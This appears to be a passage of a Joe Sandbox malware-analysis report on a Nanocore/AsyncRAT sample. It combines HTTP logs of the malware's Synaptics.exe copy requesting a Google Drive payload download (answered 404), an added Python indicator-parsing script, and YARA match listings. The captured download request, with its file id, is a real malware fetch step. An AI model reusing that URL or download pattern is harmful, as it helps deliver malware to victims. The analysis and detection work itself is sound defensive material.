                                                  Set-Cookie: NID=511=mjLYExoCbbzoBBUNtGENtY1M0qKSlrmcXoYIJs_CCALnZCIBOqRp-6QCq8BTRpdonT8b51hpbQiifNkp-lDolBQYDmXkMflxAtOsGTOCzEEwcE_m_YCznKVQUDPJwzWP67jsK7TbGuvkjGhB4aiIzcwX0QCU0QfLneZL1N-82lk; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2022-01-26 01:40:42 UTC | 9 | IN | Data Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                                                  2022-01-26 01:40:42 UTC | 9 | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                  6 | 192.168.2.3 | 49774 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
                                                  Timestamp | kBytes transferred | Direction | Data
                                                  2022-01-26 01:40:42 UTC | 9 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
                                                  2022-01-26 01:40:43 UTC | 10 | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Content-Security-Policy: script-src 'nonce-ftrJSB7t2WqD3Wc0doJpzQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Date: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=tgTMfZ7NTv3R_IbrSihjBb2kk2KK_CmJAfjV8L7E1gj4Y4KyElEhEF7auzo5NNAF14Er8xmdQUjR1JrqDdruxUCOf144megLwLiTcIrUnMGZ3M5zqxV_TbzDZP_KcKlSmjUpwVMXYOVgPbfDy-mE52xpmx5XYc-gW0fNu7Lj6xE; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2022-01-26 01:40:43 UTC | 11 | IN | Data Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                                                  2022-01-26 01:40:43 UTC | 11 | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                  7 | 192.168.2.3 | 49775 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
                                                  Timestamp | kBytes transferred | Direction | Data
                                                  2022-01-26 01:40:42 UTC | 9 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
                                                  2022-01-26 01:40:43 UTC | 11 | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Content-Security-Policy: script-src 'nonce-g3DFDAYiVjvuKejFhieIhA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Date: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=XWSM1KThS4sUsrpzKBe-UXkKfBYAOV_V-pBG4TKFtlwNETSmBsNYLPwdIwLP0C-cxljhicCjVhOhPmGHGngvqmlM2xSVvWyVCpJQp2pHYXPcOD30RrXp7d7_kmx8iB9z6zkwLZ1gA4C9LvCNMS4ZvE6vwxPFj2YLPWJWrLwBtuU; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2022-01-26 01:40:43 UTC | 12 | IN | Data Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                                                  2022-01-26 01:40:43 UTC | 13 | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.3 | 49777 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-01-26 01:40:43 UTC | 13 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
2022-01-26 01:40:43 UTC | 14 | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Content-Security-Policy: script-src 'nonce-nGVV6uaGbC+cgXeCHrTnSA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Date: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=VdtJ7dEWxYuwyj39zjdCItptsaZ6X41Pt1W2YzyShAKVYzCo0n_VAjG3Kn-q7l3N32RNwv0zA2ey7csKpdnOYEPwRG8aljEu-tCTLhtS6O7TKkJJn4tmHfofq494iuEnE3vtL1knh7Pf5mhXt5w5tA2uLL2slaN9xSnjd-w54RM; expires=Thu, 28-Jul-2022 01:40:43 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
2022-01-26 01:40:43 UTC | 16 | IN | Data Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
2022-01-26 01:40:43 UTC | 16 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.3 | 49776 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-01-26 01:40:43 UTC | 13 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
2022-01-26 01:40:43 UTC | 13 | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Content-Security-Policy: script-src 'nonce-UDhg3Ol/vxNIFYfR64ajjw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Date: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=orlJ0NdqZKBuJgdBAEhrpiJB9dinWrdefjKHLXO8dDrwrs2Gl1KvH5O7_-hmsGmBPar5jEJIZpwkTCp2aADXUJ0v22jDK2OpqNdmc3PhtYeUGrfIsg6cJvKc8XJd9d_le0i0QmiTXebU0Dlow0IYxVePmxM_0xdnuzLXfA_AGj0; expires=Thu, 28-Jul-2022 01:40:43 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
2022-01-26 01:40:43 UTC | 14 | IN | Data Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
2022-01-26 01:40:43 UTC | 14 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


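The sessions above show the persistence copy C:\ProgramData\Synaptics\Synaptics.exe requesting a Google Drive direct download with a User-Agent equal to its own image name, and Google answering 404, so the hosted payload was already gone when this run was made. As an added example that is not part of the Joe Sandbox report, the Python below parses one session record in the row layout used here, rebuilds the response body from the Data Raw hex (decoding the chunked transfer encoding) and flags the indicators a detection engineer would key on. The embedded session text is a constructed, header-trimmed copy of session 8; the hex bytes are the page's own. The function names and the flag wording are this example's choices.

```python
"""Added example: parse one Joe Sandbox-style HTTP session record, rebuild the
response body from the 'Data Raw' hex rows and flag the indicators seen here."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed input: session 8 from this report in the row layout used above,
# with most response headers trimmed. The hex is the page's own 'Data Raw'.
SAMPLE = r"""Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.3 | 49777 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-01-26 01:40:43 UTC | 13 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2022-01-26 01:40:43 UTC | 14 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: GSE
Connection: close
Transfer-Encoding: chunked
2022-01-26 01:40:43 UTC | 16 | IN | Data Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
2022-01-26 01:40:43 UTC | 16 | IN | Data Raw: 30 0d 0a 0d 0a
"""

ROW = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d UTC) \| (\d+) \| (IN|OUT) \| (.*)$")
SESSION_KEYS = ("id", "src_ip", "src_port", "dst_ip", "dst_port", "process")


def dechunk(raw):
    """Decode an HTTP/1.1 chunked body: '<hex size>\\r\\n<data>\\r\\n' ... '0\\r\\n\\r\\n'."""
    out, pos = bytearray(), 0
    while True:
        end = raw.index(b"\r\n", pos)                # ValueError if the capture is truncated
        size = int(raw[pos:end].split(b";")[0], 16)  # chunk extensions after ';' are ignored
        if size == 0:
            return bytes(out)
        out += raw[end + 2:end + 2 + size]
        pos = end + 2 + size + 2                     # skip the data and its trailing CRLF


def parse_session(text):
    """Session 5-tuple plus one dict per HTTP message (direction, start line, headers, raw body)."""
    lines = text.splitlines()
    session = dict(zip(SESSION_KEYS, (f.strip() for f in lines[1].split("|"))))
    messages, cur = [], None
    for line in lines[3:]:
        m = ROW.match(line)
        if m:
            _ts, _kb, direction, data = m.groups()
            if data.startswith("Data Raw:"):
                if cur is not None:
                    cur["raw"] += bytes.fromhex(data[len("Data Raw:"):].strip())
            else:
                cur = {"direction": direction, "start_line": data, "headers": {}, "raw": b""}
                messages.append(cur)
        elif cur is not None and ":" in line and not line.startswith("Data Ascii:"):
            name, _, value = line.partition(":")
            cur["headers"][name.strip()] = value.strip()
    session["messages"] = messages
    return session


def analyze(text):
    """Return the parsed session, the decoded response body and a list of indicator strings."""
    session = parse_session(text)
    proc = session["process"]
    image = proc.rsplit("\\", 1)[-1]
    flags, body, status = [], b"", ""
    if proc.lower().startswith("c:\\programdata\\"):
        flags.append("process image under ProgramData: " + proc)
    for msg in session["messages"]:
        if msg["direction"] == "OUT":
            _method, _, rest = msg["start_line"].partition(" ")
            target = rest.rsplit(" ", 1)[0]              # drop the HTTP version
            host = msg["headers"].get("Host", "")
            ua = msg["headers"].get("User-Agent", "")
            if ua and ua.lower() == image.lower():
                flags.append("User-Agent equals process image name: " + ua)
            query = parse_qs(urlsplit(target).query)
            if host == "docs.google.com" and target.startswith("/uc?") and query.get("export") == ["download"]:
                flags.append("Google Drive direct-download fetch, file id " + query.get("id", ["?"])[0])
        else:
            status = msg["start_line"].split(" ")[1] if msg["start_line"].startswith("HTTP/") else ""
            chunked = msg["headers"].get("Transfer-Encoding", "").lower() == "chunked"
            body = dechunk(msg["raw"]) if chunked else msg["raw"]
            if status == "404":
                flags.append("download URL answered HTTP 404: hosted payload removed or never existed")
    return {"session": session, "status": status, "body": body, "flags": flags}


if __name__ == "__main__":
    result = analyze(SAMPLE)
    print(result["session"]["process"], result["status"], len(result["body"]), "bytes")
    for f in result["flags"]:
        print(" -", f)
```

The first chunk header in the capture is `8d`, i.e. 141 bytes, which is exactly the length of Google's 404 page once the chunk framing is stripped; `dechunk` therefore returns the same text the report shows under Data Ascii. The User-Agent check is the cheapest of the three network indicators to turn into a proxy rule: a legitimate client never sends its own executable name as the agent string.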
                                                  Target ID:0
                                                  Start time:02:39:38
                                                  Start date:26/01/2022
                                                  Path:C:\Users\user\Desktop\y8kdmHi6x3.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\y8kdmHi6x3.exe"
                                                  Imagebase:0x5b0000
                                                  File size:2083328 bytes
                                                  MD5 hash:BFF363A92AC43FF249652A83DADC02AB
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.326093400.0000000003A99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000002.326093400.0000000003A99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  Reputation:low

                                                  Target ID:4
                                                  Start time:02:39:47
                                                  Start date:26/01/2022
                                                  Path:C:\Users\user\Desktop\y8kdmHi6x3.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\y8kdmHi6x3.exe
                                                  Imagebase:0xbc0000
                                                  File size:2083328 bytes
                                                  MD5 hash:BFF363A92AC43FF249652A83DADC02AB
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Yara matches:
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.317412867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.314658286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.313768043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.312421482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.310332438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.313014699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.316511430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  Target ID:6
                                                  Start time:02:39:54
                                                  Start date:26/01/2022
                                                  Path:C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe"
                                                  Imagebase:0x3c0000
                                                  File size:1082880 bytes
                                                  MD5 hash:3A5072A9A5DC35DFB99A59F67C3DC6C0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
• Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
